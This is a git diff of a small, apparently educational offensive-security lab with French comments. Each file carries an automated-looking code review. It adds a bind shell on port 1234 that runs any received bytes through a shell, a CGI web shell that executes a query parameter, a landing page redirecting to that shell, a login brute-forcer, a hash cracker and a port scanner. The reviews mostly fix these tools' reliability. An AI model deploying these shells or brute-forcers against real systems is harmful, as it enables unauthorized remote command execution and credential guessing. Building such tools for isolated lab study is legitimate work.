-rw-r--r--bindshell.py16
-rw-r--r--bruteforce.py27
-rw-r--r--chat_client.py15
-rw-r--r--chat_server.py18
-rw-r--r--connect.py14
-rw-r--r--crack_hash.py20
-rwxr-xr-xhtml/cgi-bin/webshell.cgi35
-rw-r--r--html/index.html12
-rw-r--r--rot13.py4
-rw-r--r--scan.py17
10 files changed, 178 insertions, 0 deletions
diff --git a/bindshell.py b/bindshell.py
new file mode 100644
index 0000000..faa014d
--- /dev/null
+++ b/bindshell.py
@@ -0,0 +1,16 @@
+#!/usr/bin/env python3
+import socket,os
+
+try:
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.bind(('', 1234))
+ s.listen()
+ conn,addr = s.accept()
+ while 1:
+ data = conn.recv(1024)
+ reponse=os.popen(data.decode()).read()
+ conn.sendall(str(reponse).encode())
+except KeyboardInterrupt:
+ s.close()
+finally:
+ print("bye")
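Review bot: The receive loop never ends when the client disconnects: `conn.recv(1024)` then returns `b''` on every call, `os.popen('')` spawns an empty shell each iteration and the later `sendall` on the dead connection will presumably raise, which only the `finally` prints past, leaving the listening socket open. Add `if not data: break` directly after the `recv`, and close `conn` and `s` in `finally` rather than only on `KeyboardInterrupt`. As written the listener is bound to all interfaces and executes whatever any peer sends through a shell, which is the point of a lab bind shell but should be stated in a header comment, e.g. `# Lab bind shell: unauthenticated, runs received bytes via a shell; use only on an isolated network.` The variable name `reponse` is also a typo for `response`.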
diff --git a/bruteforce.py b/bruteforce.py
new file mode 100644
index 0000000..45d950b
--- /dev/null
+++ b/bruteforce.py
@@ -0,0 +1,27 @@
+import sys
+import requests
+
+def bruteforce(url,username,password):
+ reponse=requests.post(url=url,data={
+ "username":username,
+ "password":password
+ })
+ #print(reponse.text)
+ if "Mauvais mot de passe" in reponse.text:
+ print("mauvais pwd")
+ return False
+ else:
+ print(f"Trouvé password \"{password}\"")
+ return True
+
+if __name__ == "__main__":
+ url = sys.argv[1]
+ dico = sys.argv[2]
+ with open(dico, 'r') as wordlist:
+ for password in wordlist.readlines():
+ password=password.strip()
+ if bruteforce(url,"jerome",password)==True:
+ sys.exit()
+
+#bruteforce("http://localhost/page.php","jerome","secret")
+
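Review bot: Success is inferred from the absence of "Mauvais mot de passe" in the response body, so any other reply — a 4xx/5xx error page, a lockout or rate-limit message, a WAF block page — is reported as the found password and stops the run. Check the status first, `if not reponse.ok or "Mauvais mot de passe" in reponse.text:`, and give the request a timeout, `requests.post(url=url, data={...}, timeout=10)`, so a stalled target does not hang the script. The username is hard-coded to "jerome" in the `__main__` block although `bruteforce()` takes it as a parameter; reading it from `sys.argv[3]` would make the tool reusable. The commented-out example call at the bottom should become a docstring or a usage line rather than dead code.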
diff --git a/chat_client.py b/chat_client.py
new file mode 100644
index 0000000..0d1d9e8
--- /dev/null
+++ b/chat_client.py
@@ -0,0 +1,15 @@
+#!/usr/bin/env python3
+import socket
+
+try:
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect(("localhost", 1234)) # adresse ip + port du serveur (tuple))
+ while 1:
+ message= input()
+ s.sendall(message.encode())
+ data=s.recv(1024)
+ print(data.decode())
+except KeyboardInterrupt:
+ s.close()
+finally:
+ print("bye")
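Review bot: When the server closes the connection, `s.recv(1024)` returns `b''` and the loop keeps prompting and sending into a dead socket; add `if not data: break` after the `recv`. `input()` at end of input raises `EOFError`, which is not caught, so only `KeyboardInterrupt` closes the socket — a `with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:` block (or closing in `finally`) covers both paths. A single 1024-byte `recv` also returns at most one fragment of a longer message; that is acceptable for a lab chat but worth a comment so nobody relies on message boundaries.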
diff --git a/chat_server.py b/chat_server.py
new file mode 100644
index 0000000..d857e99
--- /dev/null
+++ b/chat_server.py
@@ -0,0 +1,18 @@
+#!/usr/bin/env python3
+import socket
+
+try:
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.bind(('', 1234)) # toutes les interfaces réseau sur le port 1234
+ s.listen()
+ conn,addr = s.accept()
+ while 1:
+ data=conn.recv(1024)
+ print(data.decode())
+ reponse=input()
+ conn.sendall(reponse.encode())
+except KeyboardInterrupt:
+ s.close()
+finally:
+ print("bye")
+
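Review bot: A client disconnect is not detected: `conn.recv(1024)` returns `b''`, the server prints an empty line and then blocks in `input()` waiting for a reply to send to a closed socket. Add `if not data: break` after the `recv`, and close `conn` in `finally` (the current `finally` only prints). Binding to `''` with no authentication is as intended for the exercise, but since `accept()` is called once the file should say that the server serves exactly one client and exits, e.g. `# Accepts a single client; exits when that client disconnects.`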
diff --git a/connect.py b/connect.py
new file mode 100644
index 0000000..858d82f
--- /dev/null
+++ b/connect.py
@@ -0,0 +1,14 @@
+import sys
+host=sys.argv[1]
+port=int(sys.argv[2])
+
+import socket
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+addr_server=(host,port)
+tentative=s.connect_ex(addr_server) #connect_ex renvoie 0 en cas de succès...
+if tentative==0:
+ print("port 80 ouvert")
+else:
+ print("Echec de connexion")
+s.close()
+
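Review bot: The success message hard-codes port 80 — `print("port 80 ouvert")` — while the port comes from `sys.argv[2]`, so the output is wrong for every other port; use `print(f"port {port} ouvert")`. `connect_ex` has no timeout here, so a filtered port can block for the OS default connect timeout; call `s.settimeout(2)` before it. A missing or non-numeric argument raises an uncaught `IndexError`/`ValueError`; a usage message would be friendlier, and the socket should be closed in a `with` block so it is released on those error paths too.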
diff --git a/crack_hash.py b/crack_hash.py
new file mode 100644
index 0000000..a8ade90
--- /dev/null
+++ b/crack_hash.py
@@ -0,0 +1,20 @@
+import sys
+import hashlib
+
+def crack_hash(hash,wordlist,hashsum) :
+ """
+ Args:
+ hash : le hash à craquer
+ wordlist : la wordlist à utiliser
+ hashsum : md5 ou sha256 ou sha512...
+ """
+ with open(wordlist,"r") as fichier:
+ lignes = fichier.readlines()
+ for ligne in lignes:
+ #if hashlib.md5(ligne.strip().encode()).hexdigest() == hash:
+ if getattr(hashlib, hashsum)(ligne.strip().encode()).hexdigest() == hash :
+ print(f"trouvé : {ligne}")
+ exit()
+
+if __name__ == "__main__":
+ crack_hash(sys.argv[1],sys.argv[2],sys.argv[3])
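Review bot: `getattr(hashlib, hashsum)` on the third argument accepts any attribute of the module, not just a digest constructor, and fails with an unhelpful `TypeError`/`AttributeError` on a bad name; `hashlib.new(hashsum, ligne.strip().encode()).hexdigest()` is the standard form and also reaches algorithms only listed in `hashlib.algorithms_available`. The comparison is case-sensitive although hex digests are commonly pasted in upper case, so normalize once before the loop, `target = hash.lower()`, and compare against that. `readlines()` loads the whole wordlist into memory and a single non-UTF-8 line aborts the run with `UnicodeDecodeError`; iterating the file opened with `errors="ignore"` (or in binary mode) avoids both. `hash` also shadows the builtin, and the bare `exit()` inside the function should be a `return` so callers can use the result.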
diff --git a/html/cgi-bin/webshell.cgi b/html/cgi-bin/webshell.cgi
new file mode 100755
index 0000000..6598d37
--- /dev/null
+++ b/html/cgi-bin/webshell.cgi
@@ -0,0 +1,35 @@
+#!/usr/bin/env python3
+
+# après avoir lancé le serveur : python3 -m http.server --cgi
+# placer le script (rendu exécutable) dans /cgi-bin...
+
+import cgi
+import os
+
+form = cgi.FieldStorage()
+cmd = form.getvalue('command')
+user = os.getlogin()
+host = os.environ.get('SERVER_NAME')
+pwd = os.environ.get('PWD')
+
+print("Content-Type: text/html; charset=UTF-8\n\n")
+print ("""
+<html>
+<head>
+<title>Web shell</title>
+</head>
+<body>
+<h1>Web shell</h1>
+<p>Entrez votre commande : </p>
+<form action=''>
+<input type='text' name='command' id='command' />
+<input type='submit' value='submit' />
+</form>""")
+if cmd :
+ print("<pre style='display:inline-block;min-width:50em;padding:1em;background-color:black;color:white'>")
+ print(f"{user}@{host}:{pwd}$ {cmd}\n{os.popen(cmd).read()}")
+ print("</pre>")
+print("""
+<script>document.getElementById("command").focus()</script>
+</body>
+</html>""")
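Review bot: The command and its output are interpolated into the HTML unescaped on the `print(f"{user}@{host}:{pwd}$ ...` line, so a crafted `?command=` link is a reflected XSS on top of the intended command execution; wrap both with `html.escape()`: `print(f"{user}@{host}:{pwd}$ {html.escape(cmd)}\n{html.escape(os.popen(cmd).read())}")` after adding `import html`. `os.getlogin()` needs a controlling terminal and raises `OSError` under many service setups, so `getpass.getuser()` is the robust choice. The `cgi` module is deprecated since Python 3.11 and removed in 3.13, so the header comment should state the Python versions the script works on. The header line already ends with `\n\n` and `print` adds another newline, which is harmless but could be a single `\n`.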
diff --git a/html/index.html b/html/index.html
new file mode 100644
index 0000000..ac28908
--- /dev/null
+++ b/html/index.html
@@ -0,0 +1,12 @@
+<!DOCTYPE>
+<html lang="en">
+<head>
+<title>redirection</title>
+<meta http-equiv="refresh" content="0;url=/cgi-bin/webshell.cgi" />
+</head>
+
+<body>
+
+</body>
+
+</html>
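Review bot: `<!DOCTYPE>` without a document type name is invalid and puts browsers in quirks mode; it should be `<!DOCTYPE html>`. The page redirects unconditionally to `/cgi-bin/webshell.cgi`, so a short comment such as `<!-- Lab landing page: immediately redirects to the CGI web shell -->` would make its purpose clear to anyone finding it in the tree.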
diff --git a/rot13.py b/rot13.py
new file mode 100644
index 0000000..f2d97b5
--- /dev/null
+++ b/rot13.py
@@ -0,0 +1,4 @@
+#!/usr/bin/env python3
+import codecs
+message = input()
+print(codecs.encode(message,'rot_13'))
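Review bot: The script carries no comment on what it is for, and since `codecs.encode(..., 'rot_13')` is its own inverse it is easy to mistake for encryption; a one-line header such as `# ROT13 obfuscation, not encryption: running the output through the script again restores the input.` would make the tool self-describing.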
diff --git a/scan.py b/scan.py
new file mode 100644
index 0000000..8b878ef
--- /dev/null
+++ b/scan.py
@@ -0,0 +1,17 @@
+import socket
+
+host="127.0.0.1"
+for port in range(0,65535):
+ try:
+ s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+ s.settimeout(0.5)
+ s.connect((host,port)) # un tuple en argument : (( ))
+ try:
+ banner = s.recv(1024)
+ print("Le port ",port," est ouvert", banner.decode("utf-8").strip())
+ except:
+ print("Le port ",port," est ouvert")
+ except:
+ pass
+
+s.close()
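Review bot: The outer bare `except: pass` swallows `BaseException`, including `KeyboardInterrupt`, so Ctrl-C during the 65535-port sweep is silently ignored and the scan keeps running; catch `OSError` (what `connect` raises) instead. Each iteration opens a new socket but only the last one is closed after the loop, leaking a descriptor per port; a `with socket.socket(...) as s:` block closes it every round. `range(0, 65535)` stops at 65534, so port 65535 is never tested; `range(1, 65536)` covers the full space. The inner bare except currently catches both the `recv` timeout and a banner `decode` failure and still reports the port open; `except (OSError, UnicodeDecodeError)` keeps that behaviour explicitly.
```python
for port in range(1, 65536):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(0.5)
        try:
            s.connect((host, port))
        except OSError:
            continue
        try:
            banner = s.recv(1024)
            print("Le port ", port, " est ouvert", banner.decode("utf-8").strip())
        except (OSError, UnicodeDecodeError):
            print("Le port ", port, " est ouvert")
```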